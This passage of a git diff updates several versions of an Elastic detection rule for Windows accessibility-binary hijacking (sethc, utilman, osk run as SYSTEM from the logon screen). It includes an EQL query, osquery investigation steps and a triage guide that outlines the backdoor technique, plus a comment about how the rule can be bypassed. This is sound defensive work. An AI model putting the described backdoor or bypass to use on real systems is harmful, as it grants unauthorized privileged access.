identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"Utilman.exe\", \"winlogon.exe\") and user.name == \"SYSTEM\" and\n process.args :\n (\n \"C:\\\\Windows\\\\System32\\\\osk.exe\",\n \"C:\\\\Windows\\\\System32\\\\Magnify.exe\",\n \"C:\\\\Windows\\\\System32\\\\Narrator.exe\",\n \"C:\\\\Windows\\\\System32\\\\Sethc.exe\",\n \"utilman.exe\",\n \"ATBroker.exe\",\n \"DisplaySwitch.exe\",\n \"sethc.exe\"\n )\n and not process.pe.original_file_name in\n (\n \"osk.exe\",\n \"sethc.exe\",\n \"utilman2.exe\",\n \"DisplaySwitch.exe\",\n \"ATBroker.exe\",\n \"ScreenMagnifier.exe\",\n \"SR.exe\",\n \"Narrator.exe\",\n \"magnify.exe\",\n \"MAGNIFY.EXE\"\n )\n\n/* uncomment once in winlogbeat to avoid bypass with rogue process with matching pe original file name */\n/* and process.code_signature.subject_name == \"Microsoft Windows\" and process.code_signature.status == \"trusted\" */\n", "references": [ "https://www.elastic.co/blog/practical-security-engineering-stateful-detection" @@ -63,7 +63,7 @@ ], "risk_score": 73, "rule_id": "7405ddf1-6c8e-41ce-818f-48bea6bcaed8", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_105.json b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_105.json index fb4db6d39a7..b00ac740e5e 100644 --- a/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_105.json +++ b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_105.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Modification of Accessibility Binaries", - "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features binaries' original file names, which is likely a custom binary deployed by the attacker.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features binaries' original file names, which is likely a custom binary deployed by the attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"Utilman.exe\", \"winlogon.exe\") and user.name == \"SYSTEM\" and\n process.args :\n (\n \"C:\\\\Windows\\\\System32\\\\osk.exe\",\n \"C:\\\\Windows\\\\System32\\\\Magnify.exe\",\n \"C:\\\\Windows\\\\System32\\\\Narrator.exe\",\n \"C:\\\\Windows\\\\System32\\\\Sethc.exe\",\n \"utilman.exe\",\n \"ATBroker.exe\",\n \"DisplaySwitch.exe\",\n \"sethc.exe\"\n )\n and not process.pe.original_file_name in\n (\n \"osk.exe\",\n \"sethc.exe\",\n \"utilman2.exe\",\n \"DisplaySwitch.exe\",\n \"ATBroker.exe\",\n \"ScreenMagnifier.exe\",\n \"SR.exe\",\n \"Narrator.exe\",\n \"magnify.exe\",\n \"MAGNIFY.EXE\"\n )\n\n/* uncomment once in winlogbeat to avoid bypass with rogue process with matching pe original file name */\n/* and process.code_signature.subject_name == \"Microsoft Windows\" and process.code_signature.status == \"trusted\" */\n", "references": [ "https://www.elastic.co/blog/practical-security-engineering-stateful-detection" @@ -63,7 +63,7 @@ ], "risk_score": 73, "rule_id": "7405ddf1-6c8e-41ce-818f-48bea6bcaed8", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_106.json b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_106.json index 78984d225d5..1efd055ec50 100644 --- a/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_106.json +++ b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Modification of Accessibility Binaries", - "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features binaries' original file names, which is likely a custom binary deployed by the attacker.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features binaries' original file names, which is likely a custom binary deployed by the attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"Utilman.exe\", \"winlogon.exe\") and user.name == \"SYSTEM\" and\n process.args :\n (\n \"C:\\\\Windows\\\\System32\\\\osk.exe\",\n \"C:\\\\Windows\\\\System32\\\\Magnify.exe\",\n \"C:\\\\Windows\\\\System32\\\\Narrator.exe\",\n \"C:\\\\Windows\\\\System32\\\\Sethc.exe\",\n \"utilman.exe\",\n \"ATBroker.exe\",\n \"DisplaySwitch.exe\",\n \"sethc.exe\"\n )\n and not process.pe.original_file_name in\n (\n \"osk.exe\",\n \"sethc.exe\",\n \"utilman2.exe\",\n \"DisplaySwitch.exe\",\n \"ATBroker.exe\",\n \"ScreenMagnifier.exe\",\n \"SR.exe\",\n \"Narrator.exe\",\n \"magnify.exe\",\n \"MAGNIFY.EXE\"\n )\n\n/* uncomment once in winlogbeat to avoid bypass with rogue process with matching pe original file name */\n/* and process.code_signature.subject_name == \"Microsoft Windows\" and process.code_signature.status == \"trusted\" */\n", "references": [ "https://www.elastic.co/blog/practical-security-engineering-stateful-detection" @@ -63,7 +63,7 @@ ], "risk_score": 73, "rule_id": "7405ddf1-6c8e-41ce-818f-48bea6bcaed8", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_107.json b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_107.json index 1c7a7e5fe71..90783d297de 100644 --- a/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_107.json +++ b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_107.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Modification of Accessibility Binaries", - "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features binaries' original file names, which is likely a custom binary deployed by the attacker.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features binaries' original file names, which is likely a custom binary deployed by the attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR 